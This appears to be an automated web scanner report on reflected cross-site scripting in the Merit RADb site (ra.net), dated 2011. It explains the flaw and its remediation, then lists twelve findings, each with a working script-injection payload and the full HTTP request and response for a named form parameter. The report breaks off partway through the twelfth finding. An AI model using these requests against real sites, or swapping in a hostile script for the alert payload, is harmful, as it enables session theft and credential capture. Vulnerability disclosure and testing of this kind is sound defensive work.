XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, ra.net, radb.net

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.ra.net/query/ [advanced_query parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/query/

Issue detail

The value of the advanced_query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a38"><script>alert(1)</script>776e69af50c1fa45e was submitted in the advanced_query parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /query/?advanced_query=c2a38"><script>alert(1)</script>776e69af50c1fa45e&keywords=204.238.232.0&query=Query&-T+option=&ip_option=&-i+option= HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/query/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:40:18 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 31982

<HTML>
<HEAD>
<TITLE>Merit RADb Query</TITLE>
<META NAME="Description" CONTENT="Query the Merit RADb database, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="Merit RAD
...[SNIP]...
<input type="hidden" name="advanced_query" id="advanced_query" value="c2a38"><script>alert(1)</script>776e69af50c1fa45e">
...[SNIP]...

1.2. http://www.ra.net/register/ [ADDITIONAL_ASNS parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ADDITIONAL_ASNS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2069"><script>alert(1)</script>831ec733afb was submitted in the ADDITIONAL_ASNS parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=e2069"><script>alert(1)</script>831ec733afb&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:00 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45454

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ADDITIONAL_ASNS" size=30 maxlength=20 value="e2069"><script>alert(1)</script>831ec733afb">
...[SNIP]...

1.3. http://www.ra.net/register/ [ADMIN_EMAIL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ADMIN_EMAIL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab921"><script>alert(1)</script>25c9bdc482f was submitted in the ADMIN_EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=ab921"><script>alert(1)</script>25c9bdc482f&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:41 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45824

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ADMIN_EMAIL" size=40 maxlength=60 value="ab921"><script>alert(1)</script>25c9bdc482f">
...[SNIP]...

1.4. http://www.ra.net/register/ [ADMIN_FIRST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ADMIN_FIRST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fec2"><script>alert(1)</script>f71f12459d5 was submitted in the ADMIN_FIRST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=3fec2"><script>alert(1)</script>f71f12459d5&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:26 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45559

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ADMIN_FIRST_NAME" size=14 maxlength=20 value="3fec2"><script>alert(1)</script>f71f12459d5">
...[SNIP]...

1.5. http://www.ra.net/register/ [ADMIN_LAST_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ADMIN_LAST_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51bd5"><script>alert(1)</script>c79a34baaaf was submitted in the ADMIN_LAST_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=51bd5"><script>alert(1)</script>c79a34baaaf&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:42:33 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45559

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ADMIN_LAST_NAME" size=24 maxlength=30 value="51bd5"><script>alert(1)</script>c79a34baaaf">
...[SNIP]...

1.6. http://www.ra.net/register/ [ASN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ASN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ef3"><script>alert(1)</script>f53db05645d was submitted in the ASN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=99ef3"><script>alert(1)</script>f53db05645d&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:38:51 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45440

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ASN" size=20 maxlength=10 value="99ef3"><script>alert(1)</script>f53db05645d">
...[SNIP]...

1.7. http://www.ra.net/register/ [CITY parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the CITY request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92cc8"><script>alert(1)</script>ee4136180b2 was submitted in the CITY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=92cc8"><script>alert(1)</script>ee4136180b2&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASS
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:25 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45389

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="CITY" size=40 maxlength=30 value="92cc8"><script>alert(1)</script>ee4136180b2">
...[SNIP]...

1.8. http://www.ra.net/register/ [NOTIFY_EMAIL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the NOTIFY_EMAIL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c6fd"><script>alert(1)</script>21964fc5a36 was submitted in the NOTIFY_EMAIL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=4c6fd"><script>alert(1)</script>21964fc5a36&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:43:30 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45622

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="NOTIFY_EMAIL" size=40 maxlength=60 value="4c6fd"><script>alert(1)</script>21964fc5a36">
...[SNIP]...

1.9. http://www.ra.net/register/ [ORG_NAME parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the ORG_NAME request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f0f2"><script>alert(1)</script>6d8a333fccd was submitted in the ORG_NAME parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=5f0f2"><script>alert(1)</script>6d8a333fccd&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAI
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:10 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45376

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="ORG_NAME" size=40 maxlength=50 value="5f0f2"><script>alert(1)</script>6d8a333fccd">
...[SNIP]...

1.10. http://www.ra.net/register/ [PASSWORD_AGAIN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the PASSWORD_AGAIN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe24a"><script>alert(1)</script>63d08048826 was submitted in the PASSWORD_AGAIN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=fe24a"><script>alert(1)</script>63d08048826&NOTIFY_EMAIL=&UPDATE_EMAIL=&REFERRAL_SOURCE_TYPE=&REFERRED_BY=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:43:22 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45398

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="password" name="PASSWORD_AGAIN" size=20 maxlength=20 value="fe24a"><script>alert(1)</script>63d08048826">
...[SNIP]...

1.11. http://www.ra.net/register/ [POSTAL_CODE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the POSTAL_CODE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac689"><script>alert(1)</script>3e938e57e81 was submitted in the POSTAL_CODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=3&ASN=&ADDITIONAL_ASNS=&ORG_NAME=&STREET_ADDRESS=&CITY=&STATE=&STATE_OTHER=&COUNTRY=&POSTAL_CODE=ac689"><script>alert(1)</script>3e938e57e81&YOUR_FIRST_NAME=&YOUR_LAST_NAME=&YOUR_EMAIL=&ADMIN_FIRST_NAME=&ADMIN_LAST_NAME=&ADMIN_EMAIL=&TECH_FIRST_NAME=&TECH_LAST_NAME=&TECH_EMAIL=&AUTH_PASSWORD=&PASSWORD_AGAIN=&NOTIFY_EMAIL=&UPDATE_EMAIL=&RE
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:53 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 45398

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
<input type="text" name="POSTAL_CODE" size=20 maxlength=20 value="ac689"><script>alert(1)</script>3e938e57e81">
...[SNIP]...

1.12. http://www.ra.net/register/ [REFERRED_BY parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The value of the REFERRED_BY request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3536a"><script>alert(1)</script>ab7085f6462 was submitted in the REFERRED_BY parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 334
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

